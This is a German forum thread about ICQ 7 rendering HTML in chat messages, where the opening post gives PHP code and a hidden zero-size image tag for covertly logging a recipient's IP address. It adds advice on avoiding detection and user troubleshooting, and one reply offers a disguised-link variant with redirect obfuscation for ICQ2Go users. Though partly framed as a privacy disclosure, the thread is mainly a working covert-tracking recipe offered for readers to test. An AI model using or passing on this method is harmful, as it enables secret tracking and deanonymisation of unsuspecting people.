Neben der Integration sämtlicher sozialer Netzwerke, einer neuen Foto-Sharing Funktion und vielen weiteren Features für noch mehr Interaktion ist ICQ 7 nun auch in der Lage HTML-Tags zu interpretieren (wie bei ICQ 6 bereits teilweise). So kann beispielsweise mit dem Code <font size=7 color="#FF0000">Hallo</font> ein ICQ 7 Nutzer in großer roter Schrift begrüßt werden. Es ist auf diese Weise sogar möglich ganze Webseiten zu übertragen und korrekt anzeigen zu lassen.
Ausgehend davon und in Anlehnung an den bekannten Web-Bug ist es möglich an die IP-Adresse und weitere Benutzerinformationen eines ICQ 7 Nutzers zu kommen. Schon die folgenden wenigen Zeilen PHP-Code sind für die IP-Adresse ausreichend:

Code:

<?php  $file = fopen("ip.txt", "a+");  fwrite($file, date("d.m.Y H:i:s - ").$_SERVER['REMOTE_ADDR']."\r\n");  fclose($file); ?>

Alles was man benötigt ist ein PHP-fähiger Webserver bzw. Webspace. Obige Code-Zeilen speichert man dort z.B. in eine Datei mit dem Namen ip.php und vergibt entsprechende Zugriffsrechte. An den ICQ 7 Nutzer schickt man nun die Zeile <img src="http://www.meinedomain.de/ip.php" width=0 height=0> und erhält darauffolgend einen Eintrag in der Datei ip.txt mit Datum/Zeit und der IP-Adresse. Der Grund dafür ist, dass ICQ 7 versucht über die angegebene URL (hinter src=) ein Bild zu laden und dabei das Skript aufruft. Da die Attribute width und height auf 0 gesetzt sind wird beim Empfänger kein Bild angezeigt (bzw. nur ein grauer Pixel) und er würde in dem Fall eine leere Nachricht erhalten. Setzt man also noch einen normalen Text dazu bleibt die ganze Aktion sehr wahrscheinlich unbemerkt: <img src="http://www.meinedomain.de/ip.php" width=0 height=0>Hallo</img>.

Es lassen sich natürlich noch mehr Informationen über den Benutzer ermitteln. Die folgenden Screenshots zeigen das eben genannte Vorgehen und einige weitere Möglichkeiten:



Gut zu erkennen ist hier dass ICQ 7 den Internet Explorer für das Rendering von Web-Elementen verwendet. So lassen sich bekannte Schwachstellen im Internet Explorer leicht auf ICQ 7 übertragen, was dank der automatischen Umwandlung deutlich vereinfacht wird. ICQ ist also auch nur so sicher wie der Internet Explorer selbst. Das wurde bereits bei den vergangenen Sicherheitslücken ausgenutzt. Immerhin werden bekannte Bugs und alle Arten von Skriptsprachen gefiltert.

Sicherheitslücke? Ansichtssache. Die IP-Adresse ist heutzutage nicht mehr so schützenswert wie sie es früher einmal war. Trotzdem könnte es dem einen oder anderen ein Stück Privatsphäre nehmen. Das Problem dabei ist viel mehr, dass es der Nutzer nicht verhindern kann oder auch nur bemerkt. Eine Einstellung in ICQ 7 zur Deaktivierung der automatischen Umwandlung von HTML sucht man vergeblich.

Einige Anmerkungen für alle die es selbst testen wollen:
Es ist vermutlich nur ICQ 7 betroffen und die Nachricht mit dem enthaltenen Code kann von einem Standard-Client (ICQ 6, ICQ 7 oder ICQ2Go) nicht verschickt werden bzw. hat dann nicht den beschriebenen Effekt. Außerdem werden Nachrichten mit HTML-Tags von Kontakten außerhalb der Kontaktliste standardmäßig geblockt. Und da die empfangenen Grafiken von ICQ gecachet werden sind bei einer mehrfachen Versendung an den gleichen Kontakt innerhalb kurzer Zeit unterschiedliche URLs nötig.

Ein Tool oder Web-Service hierfür wäre sicher keine große Herausforderung

Den PHP-Code aus dem Beispiel gibt es hier.

PainT hat Folgendes geschrieben:

So kann beispielsweise mit dem Code <font size=7 color="#FF0000">Hallo</font> ein ICQ 7 Nutzer in großer roter Schrift begrüßt werden.

Klappt bei mir nicht, beim Gegenüber kommt der Code so an wie eingegeben, wird aber nicht umgewandelt.
Mache ich was falsch ?

Du musst mit einem anderen Clienten als den Orginal-ICQ's schicken

Ah, überlesen.
Habs grad mit meebo probiert, damit klappt es

habe aus ausprobiert nur leider funktioniert es nicht

habe es auf ohost und funpic ausprobiert,

habt ihr einen besseren hoster?

Also habe es eben mit funpic getestet und da ging es problemlos. Hast du die Schreibrechte vergeben und die Nachricht von einen Non-Standard Client verschickt (z.B. meebo, QIP, usw.)?

Hi,

ich habe eine Frage bzgl. ICQ2GO!

Kann man mit dieser Methode meine! IP rausfinden, wenn ich! ICQ2GO benutze?

Lg

Nein, nur wenn du ICQ 7.x benutzt.

Kann man generell über ICQ2GO die IP Adresse rausfinden? Ich denke nicht.

Schließlich läuft die Verbindung ja nur über den Server und nicht direkt (man kann auch keine Dateien verschicken).

Seh ich das richtig oder lieg ich da falsch?

da gibts dann doch sicher wieder exploits?

Dude hat Folgendes geschrieben:

da gibts dann doch sicher wieder exploits?

Vermutlich. Sind nur noch nicht bekannt oder veröffentlicht.

BlueWave hat Folgendes geschrieben:

Kann man generell über ICQ2GO die IP Adresse rausfinden? Ich denke nicht.

Mit dem oben genannten Trick wahrscheinlich nicht. Da ICQ2Go aber genauso HTML-Code umwandelt und das auf Nutzerseite, könnte es durchaus gehen. Schickst du einem ICQ2Go-Nutzer beispielsweise den Code <a href="http://www.meinedomain.de/ip.php">hier klicken</a> (oder ähnliches) und animierst den Nutzer dazu auf den Link zu klicken (welcher von ICQ2Go bereits automatisch umgewandelt wird) kommst du auch an die IP-Adresse. Eine geschickte Weiterleitung oder vergleichbares würde es sogar recht gut verschleiern.

So eine frage am Rande:
Wieso klappt das mit dieser UIN-Geschichte bei mir nicht?
Und warum kommt da immer so ein Error:

Warning: date() [function.date]: It is not safe to rely on the system's timezone settings. You are *required* to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected 'Europe/Paris' for '2.0/DST' instead in C:\xampp\htdocs\xf.php on line 6

Passierte am Anfang nicht, erst als ich meinen Server mit Windows neu aufgesetzt habe... :/ (Die Zeit wird zwar richtig angezeigt in der userinfo.txt vom Rechner aber naja...)

Hast du keinen externen Server, auf dem du es testen kannst?

Ansonsten nimm doch einfach die Zeile 6 raus oder passe sie an.

Hi,

ein Kumpel hat mir erst letzt eine Nachricht nur mit einem schwarzen Punkt geschickt..
Der Punkt war nicht so hellgrau, wie bei dir, sondern richtig schwarz.

Den Punkte konnte ich durch die Maus markieren, wie ein normaler Punkt.

Kann das so ein Scan gewesen sein?

gruß

Nein, dann wird es eher ein normaler Punkt gewesen sein.